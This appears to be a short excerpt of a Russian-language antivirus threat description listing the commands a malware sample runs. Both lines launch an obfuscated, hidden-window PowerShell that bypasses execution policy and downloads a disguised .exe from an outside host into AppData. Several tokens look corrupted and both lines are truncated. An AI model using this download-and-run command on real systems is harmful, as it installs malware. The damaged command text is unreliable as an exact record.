Техническая информация
- '<SYSTEM32>\cmd.exe' /c "POwErSyILeyll.exE -eXEcutIonPolICy ByPaSS -noprOFiLe -gj "PDowsTYLe HiDDeN (nEW-objecteMysTeM.NeT.WEBclIenT).DOWNLoAdfILe('http://www.vopergooda.top/read.php?f=1.gif','%aPPDAta%.EXe');...
- '<SYSTEM32>\cmd.exe' /c "POwErSyILeyll.exE -eXEcutIonPolICy ByPaSS -noprOFiLe -gj "PDowsTYLe HiDDeN (nEW-objecteMysTeM.NeT.WEBclIenT).DOWNLoAdfILe('http://www.vopergooda.top/read.php?f=1.gif','%aPPDAta%.EXe');...' (со скрытым окном)